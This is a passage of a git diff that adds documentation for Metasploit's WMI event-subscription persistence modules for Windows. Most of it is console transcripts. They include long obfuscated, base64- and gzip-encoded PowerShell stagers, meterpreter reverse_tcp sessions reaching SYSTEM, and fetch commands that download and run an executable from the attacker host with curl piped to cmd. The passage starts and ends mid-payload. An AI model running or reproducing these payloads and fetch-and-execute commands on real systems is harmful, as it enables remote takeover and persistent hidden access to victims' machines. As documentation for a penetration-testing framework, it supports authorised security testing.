5 o 0 + d r 0 2 5 2 d P 2 P P / n k 9 9 t T 7 b R l t 4 d Z + Y E a 8 n 9 j F P U w / ' + ' w T L Z H d p 0 S 5 x t w n M / t z v N 8 p H U u 4 2 { 1 } 3 z w f E S / E N / L o F h y v q r / Q 5 9 h { 1 } e k f + / R v z + + 4 d f / v ' + ' Z h 9 r h 7 + P C P / w L Y q P B y O R { 2 } { 1 } { 1 } { 1 } { 0 } { 0 } ' ) - f ' = ' , ' A ' , ' g ' ) ) ) ) , [ S y s t e m . I O . C o m p r e s s i o n . C o m p r e s s i o n M o d e ] : : D e c o m p r e s s ) ) ) . R e a d T o E n d ( ) ) )  -InputFormat None +[+] Payload successfully staged. +[+] Final command JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAE8AYgBrAEkAVwBrAEMAQQA0ADIATwBRAFEAdQBDAFEAQgBDAEYALwA0AHEASABEAFYAZABLAFQAOQBIAEIANgBGAEoAYQAxAEMAWABDAHIASQBOAEUAcQBBADIAMQBxAGIATQB4AHUANABpAFIALwBmAGQAVwBLAHUAewAwAH0AWQBuAEIANwB6AEgAdAA5ADcAUwBZAGkAMQBJACcAKwAnAEkAawBWAG8ARAA3ADQALwBnAEwAMAB6ADIATwBYAGsAawBpAHoARQBoAFMAMwBZAHcAVgBrAE8AMQA0AEIAZAA5AFYARwBVAEUASwAnACsAJwB1ADMAVQBpAFQAdwBMAE4AMQBpAFYAYQBiAGsAUABiAFkAJwArACcAUgBwAEsAMAB1ADgANgB1AHgAbQB0ADcARAAxAFkARwAvAFUAbgB5AEQANQAyAHoANAB7ADEAfQBEAEQAZgA0ADYAWABXAE0AcwBDADMATABDADUARQBTAGcAbABKAEYAcQBNAE0ANQA1AHMAbwBkAEYAewAyAH0AaQBMAGsAOABtAFUAcABEAGkAbABFAFkARABaADQAaAB2AG0AZAAwAG8AWgBuAEUARwBxAGcAcgBtAHAATwBzAHAAcQBtAEMAMABmAEQAcgBsAG8ASABUADMAUQB0ADMATQB0AG8AVAA3AHcAQQBBAEEAQQA9AD0AJwApAC0AZgAnAGoAJwAsACcAKwAnACwAJwBlACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQA= +[+] EXECUTING: +powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAE8AYgBrAEkAVwBrAEMAQQA0ADIATwBRAFEAdQBDAFEAQgBDAEYALwA0AHEASABEAFYAZABLAFQAOQBIAEIANgBGAEoAYQAxAEMAWABDAHIASQBOAEUAcQBBADIAMQBxAGIATQB4AHUANABpAFIALwBmAGQAVwBLAHUAewAwAH0AWQBuAEIANwB6AEgAdAA5ADcAUwBZAGkAMQBJACcAKwAnAEkAawBWAG8ARAA3ADQALwBnAEwAMAB6ADIATwBYAGsAawBpAHoARQBoAFMAMwBZAHcAVgBrAE8AMQA0AEIAZAA5AFYARwBVAEUASwAnACsAJwB1ADMAVQBpAFQAdwBMAE4AMQBpAFYAYQBiAGsAUABiAFkAJwArACcAUgBwAEsAMAB1ADgANgB1AHgAbQB0ADcARAAxAFkARwAvAFUAbgB5AEQANQAyAHoANAB7ADEAfQBEAEQAZgA0ADYAWABXAE0AcwBDADMATABDADUARQBTAGcAbABKAEYAcQBNAE0ANQA1AHMAbwBkAEYAewAyAH0AaQBMAGsAOABtAFUAcABEAGkAbABFAFkARABaADQAaAB2AG0AZAAwAG8AWgBuAEUARwBxAGcAcgBtAHAATwBzAHAAcQBtAEMAMABmAEQAcgBsAG8ASABUADMAUQB0ADMATQB0AG8AVAA3AHcAQQBBAEEAQQA9AD0AJwApAC0AZgAnAGoAJwAsACcAKwAnACwAJwBlACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQA= -InputFormat None +[+] Cleaning up 6416 +[+] EXECUTING: +powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAE8AcgBrAEkAVwBrAEMAQQA0AHQAMgB6AFMAdgBMAEwATQByAFAAeQAwADMATgAnACsAJwBLADQAbQAxAHMAbgBKAFAATABVAEUAUwBDAEUAcwBzAHkAawB4AE0AeQBrAGsAdAAxAGwAQQBQAEwAVQA0AHQAVQB0AGYAVQB5ADAANgB0AEwASwA0AEoAVABzADEASgBUAFMAewAxAH0AUgBEAFMANABwAHkAcwB4AEwAVgA4AGcASQA5AGcAcAAwAEwAUQByAFAAcQAxAHsAMAB9AHQAagBrAFkAMQBMAEIAaQByAFkAUgBvAHEAOABUAG8AcQBlAGEAVQA1AE8AVABwAFEAUQAyAHMAQgB5ADkASABWAGsAbwBRACcAKwAnAEEAQQBBAEEAPQAnACkALQBmACcARwAnACwAJwA3ACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQBlAGMAaABvACAAJwBmAHcAawBFAEsARgBNAEIAJwA7AA== -InputFormat None +[+] Persistence installed! +[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251122.2931/WIN10PROLICENSE_20251122.2931.rc +``` + +Persistence Execution + +``` +msf exploit(windows/persistence/wmi/wmi_event_subscription_process) > sessions -i 1 +[*] Starting interaction with 1... + +meterpreter > execute -f calc.exe +Process 7596 created. +meterpreter > +[*] Sending stage (188998 bytes) to 2.2.2.2 +[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49759) at 2025-11-22 11:30:10 -0500 + +meterpreter > background +[*] Backgrounding session 1... +smsf exploit(windows/persistence/wmi/wmi_event_subscription_process) > sessions -i 2 +[*] Starting interaction with 2... + +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM +meterpreter > background +[*] Backgrounding session 2... +msf exploit(windows/persistence/wmi/wmi_event_subscription_process) > +``` diff --git a/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_uptime.md b/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_uptime.md new file mode 100644 index 0000000000000..48c2bd217ac81 --- /dev/null +++ b/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_uptime.md @@ -0,0 +1,134 @@ +## Vulnerable Application + +This module will create a permanent WMI event subscription to achieve file-less persistence using event filter that +will trigger the payload after the system has a certain uptime. Payloads will trigger every minute until the set end time. + +Additionally a custom command can be specified to run once the trigger is +activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a +high integrity process. It is also recommended to use staged payloads due to powershell script length limitations. + +## Verification Steps + +1. Start msfconsole +2. Get a shell on Windows +3. Do: `use exploit/windows/persistence/wmic/wmi_event_subscription_uptime` +4. Do: `set session #` +5. Do: `run` +6. Wait +7. You should get a shell. + +## Options + +### SYSTEM_UPTIME_START + +System uptime to start the trigger (In seconds). Default: `240` (4min) + +### SYSTEM_UPTIME_END + +System uptime to end the trigger (In seconds). Default: `325` (5min 25sec) + +### CLASSNAME + +WMI event class name. Default: `UPDATER` + +## Scenarios + +### Windows 10 1909 (10.0 Build 18363) + +Original Shell + +``` +resource (/root/.msf4/msfconsole.rc)> setg verbose true +verbose => true +resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1 +lhost => 1.1.1.1 +resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp +payload => cmd/linux/http/x64/meterpreter/reverse_tcp +resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp +[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp +resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL +fetch_command => CURL +resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true +fetch_pipe => true +resource (/root/.msf4/msfconsole.rc)> set lport 4450 +lport => 4450 +resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3 +FETCH_URIPATH => w3 +resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB +FETCH_FILENAME => mkaKJBzbDB +resource (/root/.msf4/msfconsole.rc)> to_handler +[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe + +[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd +[*] Payload Handler Started as Job 0 +[*] Fetch handler listening on 1.1.1.1:8080 +[*] HTTP server started +[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg +[*] Adding resource /w3 +[*] Started reverse TCP handler on 1.1.1.1:4450 +msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > +[*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg +[*] Sending payload to 2.2.2.2 (curl/7.79.1) +[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:49703) at 2025-11-22 08:35:55 -0500 + +msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1 +[*] Starting interaction with 1... + +meterpreter > getuid +Server username: WIN10PROLICENSE\windows +meterpreter > sysinfo +Computer : WIN10PROLICENSE +OS : Windows 10 1909 (10.0 Build 18363). +Architecture : x64 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 2 +Meterpreter : x64/windows +meterpreter > background +[*] Backgrounding session 1... +``` + +Persistence + +``` +msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/wmi/wmi_event_subscription_uptime +[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp +msf exploit(windows/persistence/wmi/wmi_event_subscription_uptime) > set payload windows/meterpreter/reverse_tcp +payload => windows/meterpreter/reverse_tcp +msf exploit(windows/persistence/wmi/wmi_event_subscription_uptime) > set session 1 +session => 1 +msf exploit(windows/persistence/wmi/wmi_event_subscription_uptime) > exploit +[*] Exploit running as background job 1. +[*] Exploit completed, but no session was created. + +[*] Started reverse TCP handler on 1.1.1.1:4444 +msf exploit(windows/persistence/wmi/wmi_event_subscription_uptime) > [*] Installing Persistence... +[*] Powershell command length: 6727 +[-] Compressed size: 14260 +[-] Compressed size may cause command to exceed cmd.exe's 8kB character limit. +[+] Launching stager: +[+] - Bytes remaining: 14260 +[+] EXECUTING: +powershell.exe -EncodedCommand & ( [ s c r i p t b l o c k ] : : c r e a t e ( ( N e w - O b j e c t   S y s t e m . I O . S t r e a m R e a d e r ( N e w - O b j e c t   S y s t e m . I O . C o m p r e s s i o n . G z i p S t r e a m ( ( N e w - O b j e c t   S y s t e m . I O . M e m o r y S t r e a m ( , [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ( ( ' H 4 s ' + ' I { 1 } F m 8 I W k C { 1 } 6 W Z y X b b X H a F X y U z J 2 v V g J L 1 O 0 7 N D k 0 { 2 } p C i { 2 } B b Y G s z J g F 9 i i Z N q S L d h 6 + t r f ' + ' v q C k y j S a Y I G 6 z W n 2 2 a f B f 2 f f n r 4 + n L 7 d H 7 7 9 / J + / / 3 1 2 + P n m h + X m 4 e t m e 3 f 4 9 3 c d / V 2 M r u v u J j 5 / e v e 3 d 9 d 1 n K L / G L u m e x u D Y W z K b h O D M q q 6 + x j 5 x 6 i a 7 k P 0 O z G p 4 0 P k R e z q 7 l 3 k W e x D z 0 9 1 j K I 7 i X w R + y Z + R v a R f T 9 4 1 7 5 O f I p Y N N 2 / Y l C k 9 X k n b u r u N e v 0 n H P P + b x t 2 ' + ' Z 1 5 X 9 k 9 8 t w h V 3 Y V 6 7 L 7 P j 5 1 Y t 5 0 v 0 Z + 4 v 2 W f c N g / x G 5 O 6 z f l v E r s q P W 8 S x i 2 3 R / x i D S + b p f 6 7 6 j z 7 b m / 7 s 4 1 H o f W L 4 O e u v c L 8 g 3 i v / P v R 3 W / e { 2 } e 3 f t X 9 K 3 3 n 1 a v n 9 j r J r p b f j + U 3 W f O 8 / p P V 1 E 2 3 a ' + ' f I r 2 J v e Y f s 2 0 f v J L t 3 c 9 6 t T z b k n G f O G 9 f R e T 3 / K L 2 6 3 5 I / J P + n X c x C / 5 f e s 7 L b j a x C z i v k X O J P 2 a c s 4 z L 6 u 1 j V 3 S p 6 w 7 h p { 2 } v s f 4 x p 9 9 X 5 o 4 k 8 M O j p H ' + ' 9 / c K / V 9 + 6 Z f I e c 2 5 e n Z j 8 B h F 2 f 0 v 7 L h p u r + j d 4 x N d P + B H f X + 2 X 7 1 f R 9 j V s d D 5 H X M 6 2 7 B / g 1 6 Z 6 d Y l t o n P V Y h + b N H 5 F 0 i l + z X b + 0 z j 3 6 N n D / { 2 } Y x H o X 8 a o i a f o L f D j F 9 a v u T d r s N + T / R z d i / j 0 M Y r o / i f 6 / G / ' + ' J M + N 5 G b 1 d j M t o 2 F 8 1 y D W M e R n P + E / 2 X ' + ' E V e c f + { 1 } + w / Y R + 9 z / y 6 c h + y m p + x 1 i Z 4 7 7 C 9 7 j 1 r 7 6 X e d U 4 L / i x i c w L X 8 U M l v 2 D ' + ' t i i d 9 0 3 j X 3 a p / w 2 L T n W q 8 x d p X c 0 n c U e Y P d V + B i z X r h T n 7 / C 3 u M G v 1 f 8 s 2 x w 2 D B / c / o O { 2 } n Z V + d P y n i P X W Z N 9 x 5 9 J 2 V 3 j R 8 3 o f X 9 K o p a d t Z 7 w t t C + k s P 7 d c 5 i t c M v 2 f I o e f R f q y J c + P 6 S / R q ' + ' 4 u I 3 9 i w c P w v 5 S X i R / 4 o a 3 F T y h + 7 X e f t a 9 8 k u 2 n f L e Z I 7 { 1 } 8 9 T 1 g k v w s c H 9 F M 8 2 O 6 r 0 P 0 6 X / 4 s 0 V P + W E R P d g n x k e 2 r / d k C f b 6 m / b J n V n P P e 9 b J H w 3 + l P 3 / c G 5 V y y 6 6 d 0 r c S r 6 1 / V z F B r / K H 4 4 f y b M M 7 F F j 3 z / o M 6 v P u { 1 } n 7 z 7 / r / h X + 7 x k X f 9 g v u 4 1 f / E 8 8 1 I o H 3 b v D r 9 o / R r 5 e ' + ' g L f n 6 C + w Z w f 7 + / / n f f y / U X y m + L q { 1 } b y r b u 4 R n F t h 9 { 1 } n / K 3 ' + ' y X 8 C N 5 9 3 g k 7 F e l 8 2 U t y S v / 3 P P f Y { 2 } f a p w L H 9 F I 5 P + ' + ' f F E / E 2 J E 8 m 3 a y S H 9 N g 6 L h b 4 Y e J 3 / D L { 1 } z g m v S 3 B H n D T y v / C 9 { 2 } n / 9 L v z c s 2 + J f M S z e f 5 E n N + C V / l p w 7 1 7 4 y b w y y / e l y F 9 l U / 0 / y f 8 U 8 F P 0 n e G P m c 7 S r 6 1 7 W 3 e + 9 L a / R z H D f h d 1 + S r I X H + C 7 0 L x y V 2 F R 8 k f e + ' + ' R + 4 Z 4 y a 6 S f o q H c / x p / 4 r z 9 u B L f ' + ' h N + f 8 N n e / C Y Z c i X R d 9 ' + ' 2 v O R 5 3 l c S d 7 K D 9 H q w H R r 9 n 3 i E 5 4 S T u c 8 9 w i / P + F v n / H r R 6 0 W / Y x z g s 2 S n l e M I H C s / j W v 4 o 0 ' + ' p 4 x l 7 c I 7 9 X 8 K f k K N r 8 s 0 Z u 6 b N 8 5 e 8 b 1 p / l F K / e Y L e C O O B c e D n x q v ' + ' O M 8 k E D j q Z l w s c K f + T E p 3 7 3 e t l z U C f + y B + x S 0 H 8 7 Z 2 H H u H Z E / o v w D P 5 N h S X 4 n v Z + Y K 8 t C O f C P e y 0 1 f s s I T X k z 3 W M b C e f 6 G X n k f 4 d O 5 8 Z h 6 2 n F v y j u S a w + d v / L ' + ' Y w f 8 g / 5 L l + m f w m 3 M 1 8 f 4 X 8 { 1 } + { 2 } + r z ' + ' c O J Z f 0 v r d / i M O X / L X { 1 } r i P u m Y F f 4 q I k L 2 a v O E H v x C M l d l c e + o 1 d 1 8 i d u a 5 4 M O + Z F y z H G v v q n p 7 x 0 d p 7 1 C { 2 } 5 H V 8 6 f 2 O 5 O / h z i Z 0 W 5 q W a f R P y 9 I T 8 w X n w e { 2 } 6 + 4 b c r 5 V e 9 D 2 z X I + e s I v H w o X z B { 2 } Y f 9 c + R R X J 7 1 0 P o P L Y 9 e Y F / x 6 n 3 C { 1 } z y V k b 8 d H w f O c 1 y m + B R f X 5 J f x 9 h R c b q k P l S e E K 9 3 2 r j 6 j h 1 G x I F w s Y h k r 5 n 5 t e C 8 B / S f 2 C 6 O 4 w G 8 M c Y ' + ' f 4 t 0 l e Y c 4 x I 7 C 9 5 Y 4 T X 4 x v m f m O / P U k P X m R d l p x 7 q c v K j 6 I N W t n + E F 2 c n r S u T p V d z T 4 B / h / V w P / H J e h a d 0 z q Z M d e j M d U e N / H f g y H l G ' + ' e u 3 I o 3 r O X { 2 } e Z v 5 5 b n q 5 s r 1 r 3 C R f y 2 y V 4 V L 3 1 Z D 1 D O E 3 + / J D O 1 e + 5 8 6 / z s e z 1 D P 7 3 Z c p T y i 8 P 5 D P x 5 O { 1 } t 3 ' + ' r f w t e y x w j 8 D 4 2 l i / 7 h O u C I O H 6 i j Z q 5 T f M 8 V 9 5 R N 4 m / h d s z + H f V Y D 1 6 I C 3 C n Z 0 M c O g / K / i n / V N { 2 } N z v 9 b 8 5 j i C / y p n q n I E y 9 5 q + L + G / y r / P a { 1 } H G N 4 { 2 } f E t v X p t H 9 D j n B J / p b r m t + u { 2 } U n 5 V v b U q 8 X v J P c 6 7 E / P V k L h 0 X b 6 B D 8 W P a / s 1 u O 8 7 e o 5 c X z q ' + ' P 3 Y H L s 5 1 G 1 K 1 9 + { 1 } G + d X + R I 4 / s V u G / { 1 } ' + ' n 2 E / z 1 2 z 4 2 L i f m L / q d v 3 D x j h 5 n r 3 B N 8 O c H f 4 3 + p B 4 h 7 2 V d 8 M c b f 0 m d u f 9 u u T + g 1 h x d d X + o + + X 9 L n P X h s e T n N X W D 8 D Y G z / p / 2 c q x h i e 1 b w o O l f c L 1 w X W + w 5 c 7 c v k x 7 3 v O 3 H u P 6 g T D / g v c 7 3 U 5 k f Z N f H V p e v R U v 6 W 3 p O X / w s 3 n 1 x v 5 5 y 7 g R d 0 z 8 G 8 X H C f 4 2 P v v m c H j 9 y D d 8 ' + ' X p B X a / c f 1 N H { 2 } o v K { 1 } 6 N W / h E f E b c g x f 0 r x N v L e t U r 6 9 f 7 + + B 4 6 3 z m u P m H j 0 m 4 F L y y C 7 X x i V y U K / R B 5 z 5 O t X F x s + a v K B 8 l X j E + L ' + ' + k z h s T b / q 9 g C e V r + T X O 3 h 0 X K b 6 S P G a v f K / + i v H y y L F j e y 6 w 3 7 i t { 2 } 1 y 0 { 1 } 8 0 9 G F H 7 r 3 j / i X 8 J b / p f c z + h e u q k 9 a D v y N x M k S e L X j p 2 3 5 9 7 p ' + ' 3 B l 1 p X U D / 3 h / x e t X 1 z b h 4 1 r w w 5 / x p + N c / I P k v z y w 5 9 H M / b S P n Z u N M 5 J X J p v 8 6 9 s l 1 ' + ' d x w 8 T X 0 u e j f 3 U S X Z { 2 } n l 7 T T z q + q e u O 4 O { 1 } W P B b O s 6 5 7 b n j f O M 8 5 L m e s W ' + ' 9 M 3 C { 2 } d 7 e K D v P H k N 3 ' + ' 2 y I f 9 1 f w b t n f s j N 9 5 9 d V 8 { 1 } z s v + h P u c n 4 r 4 i D q 7 J T z v b K e C H h f t a 5 8 k 6 4 Z 6 8 3 K R + T X J 6 n / B + 1 f a N J f F w 8 8 r r H f y 0 R G 7 3 6 d { 2 } 1 d U z b / k l 4 c R 2 4 { 2 } J + k 1 y T x d F s P u H ' + ' 7 H f u C k x U f f 9 d I N 9 w h X G / C / 9 j 7 0 { 2 } V 7 b 8 5 K 8 u K D ' + ' P I E 6 D v r v G 3 l / R 9 0 D + k d 0 m 5 g H X c c 5 3 c + p 8 r d P v t + 7 X g j 7 3 S D z + d h 1 D P { 1 } l v w u E V e g h n s 9 { 2 } v k h 9 c H z w T ' + ' J 9 Z P e k 3 d X 5 7 g J 9 c J h f O e 7 f o F X K y I d / p i 8 J e 7 X z 7 H 4 x w 5 Z N 8 F 5 ' + ' y l P l u { 2 } H 8 V G q M 1 w P 1 d j n l n i a t / b f v v { 1 } i c x / i i 3 p x i B 4 f s I / r r T 7 9 O v Z q ' + ' 7 Z u 5 b 5 j g 9 5 H j q Y J n N + { 2 } B 2 e W q 5 S H X 9 X P y B H 0 q + F L + n N v / z H M U F + D c 9 X l g F 8 9 P U l w t U l 3 b s x 0 7 2 H 9 D P E p v 4 0 L 6 L l 3 P w P / U k c 5 3 j f M { 2 } / j n j V 3 y 2 g H + V d w r q N b 0 v w b 3 k O I C r l 7 6 v g 9 z O a 0 v y V 0 b 9 k v L W N h L v T O h f V I + d 8 9 S M / D E w f 3 x H 3 r H r z h o 8 X x L 3 c / J v 7 j q ' + ' t R K 6 5 + d i 8 8 Z 3 z P U 9 R 3 p u a / 4 v E h 7 n P e 3 a 8 1 O y r 4 { 2 } 3 3 T 1 P 2 6 f d F / W Y O { 1 } k 7 g O 8 X B a z + E 3 O 6 f r j j f f P R / + x b y h v m e + { 1 } j ' + ' z 2 M F x 4 T y U I / c k k n 2 n 5 s F I / C 3 + m R L n 2 l 9 5 X l C k P i S 3 H 7 + { 1 } a 8 l Z s W / p + o x 5 V V i O c Z P 6 h B l 1 { 2 } q / l B f n T e R b c I k + a G / V S 3 5 V w N D d u P d 8 o 2 3 r B + L c 9 Z f + d 8 / g O v T p t P 7 Z 0 H U M / 2 S O u k K 9 I / h I f L p i L 5 O 6 b / 7 i O r 7 F / D Y + 6 T p 9 4 f u E 5 y w X n m 1 d 5 u t 5 o 4 { 1 } 3 P p z y n M q 8 R T z W 8 W + L 3 b V t X H t w n m ' + ' Z d 6 b Z + b o 7 f r 6 Z w 5 R p p j p X l g 3 c p H f Z j q v i 2 8 o X P d J w g v e / K G / D T x f H I I X z 2 1 + X d g X m d + O H C d l B t X 9 J G D u u X v G r u V 4 K b y v m D 9 s + v z J t U j B f X Z i 9 2 C f P S H / Y X n E i f i 6 N y X H F 1 / u U 6 i / 6 G ' + ' f L d p 8 2 5 B v V i 0 f f j W P Y l / q m j L h V H l 4 5 n 7 Y c + k h 9 c U V 8 q t + + 2 F e e M t n 9 H n I 0 X ' + ' O 9 1 C F + t / R b m f H x m / u K M v W n S 9 d / 5 q H z / h + t / 3 / B g x N 4 U X b Y w k u Z + 5 s 1 c T m h L z z z Z O 6 5 3 / t U L z N v d n / Y o U 4 Y E 6 f p + Z n n u s X j z H n d c 9 O L N C d ' + ' U 3 k j 5 5 7 N x 6 z z l O n F F n T D 1 P G j H f P U H e N l 7 r u C 5 y i P n L Z D D d U U Y F z v 6 Y / q D O v H C k j l I 3 3 3 X E T m W 2 D 3 N 9 V 3 3 7 O G b l K 9 + G { 1 } / u j x b 0 9 e a x U Z P q 7 z E 8 2 n f 9 2 3 h u B m 4 l r / R 2 X b R m b k c 9 S 9 3 R M 7 7 O d n 0 E H 5 5 / i 5 c W x D v 5 x b x V g I c 7 4 ' + ' 8 L 9 1 l ' + ' W a Y 2 f E H f O L E / f d 2 B 7 Y 9 c 0 c d e 7 6 o k x 8 m Z t P S + x S u H 4 k H y f / V 9 b f 8 s 3 { 2 } c 8 n 8 Z O C + v 8 I P U + c d z 1 f X 2 H F s / z f s 2 4 { 1 } H x 0 n u e e N v 9 E h 5 1 n H p ' + ' u e y s t X f a R 1 0 m + Z R f i j L l y 0 0 7 R y j t 3 1 3 q / 4 k X 6 j j x 3 t z + 2 6 H H P X E + o 0 4 S 3 q a u h 7 z + C f n G + C v N n T L 4 w v k 1 f X / 4 4 n q W e p 5 6 x H 3 k E T k 8 r 5 l H m v f P 4 a u X O u 2 E / 7 / B x + L D C + r K F f P b 3 P V 0 g 3 1 c d w 7 e z B G o b + S v s e u B h r r i S F 0 w { 2 } u 6 X O r 0 k j n / Z L o 4 z 5 + O v x M e K O a X s m u r Z I / p 7 / u e + r 8 8 8 ' + ' V P F C H 0 E d n O q d h 3 Z + 9 Z 4 4 F S 9 + c f / v O r f i n h H x s X e / a j 5 + T 1 x 6 T p P q t w / 4 Y W v 5 m B v J f v L / u H 4 j 7 8 { 1 } 8 P D S + O { 1 } / e i 5 S P p t R N v U X L R x 1 4 / q m t o 8 q W j / v Y 5 6 Z J 9 a F 5 U P / 3 X D e n j 0 l 9 k / O O / D E 1 D o f I d + n 5 r v s S 9 z 0 j z z / 8 n c H z v 8 v X u u k j u P 0 G P j y n z 9 z / / e L 8 8 / e a i X n L / e Y z d i 6 b N M c Z 0 Y f S 1 z B n y h 3 n C + y 9 o W 9 J / F C + z i X p F + k H S v L E D X G f ' + ' 5 u 6 e y 9 y 2 3 0 ' + ' f m / h 7 g v t 9 z g t s 0 5 0 / 9 r / Z 9 s 1 2 c j 1 1 n D 8 x f + J ' + ' n 8 X 6 e 8 s W H u { 2 } V 3 i + P W c s e f v E 5 7 T Z / B X { 2 } 5 w s H H f G 8 / M r b p u U D / u u M 7 + n 7 2 J p L j x D v w F z J f k z K x M O J ' + ' K f k 6 Y L X N X V e 5 n i v i N P 0 / c z z C c 8 j Z s { 2 } N / T L f R f T c Y r c X n J z x X Y H r O ' + ' / M C 6 3 ' + ' T u p E x 6 L P w 9 a 4 d e 7 l e m 1 M H M f 8 j H z g P w 7 i n N z + D 9 J n 3 v G c H r 8 u + 2 r T N X 8 E F m 3 O X m a / c H x r X n T o X z { 2 } 5 3 i O r f f 7 t v ' + ' 8 f E 8 8 T 4 ' + ' n L N / I m v v Y 8 b k R c z 6 m b U n 6 7 { 2 } t 4 U J / ' + ' 4 e e u F 5 S Z P 6 z i X z { 1 } 3 9 n a u d 6 9 r v r 1 K X j q k z z n f n r n O { 2 } B e { 2 } / t / H G J v l m d 7 D 4 { 1 } n 9 j F e j n P b f 4 F 5 1 W a B / P d i j i n D m 3 x 7 f v 7 n m s 5 b 5 3 5 q P C c L 0 v f u + g 7 P O c h / s D 1 k f x / 6 e + 9 x l l B X H 8 w f x M v / W H a n / h p 5 D k 3 + b T n 7 7 u X x q H 7 q o 8 p j / a Z L 4 f n 9 u / + 9 m / v F o + H h 3 f / 8 U + p M K I 9 g R 8 { 1 } { 1 } { 1 } { 0 } { 0 } ' ) - f ' = ' , ' A ' , ' Q ' ) ) ) ) , [ S y s t e m . I O . C o m p r e s s i o n . C o m p r e s s i o n M o d e ] : : D e c o m p r e s s ) ) ) . R e a d T o E n d ( ) ) 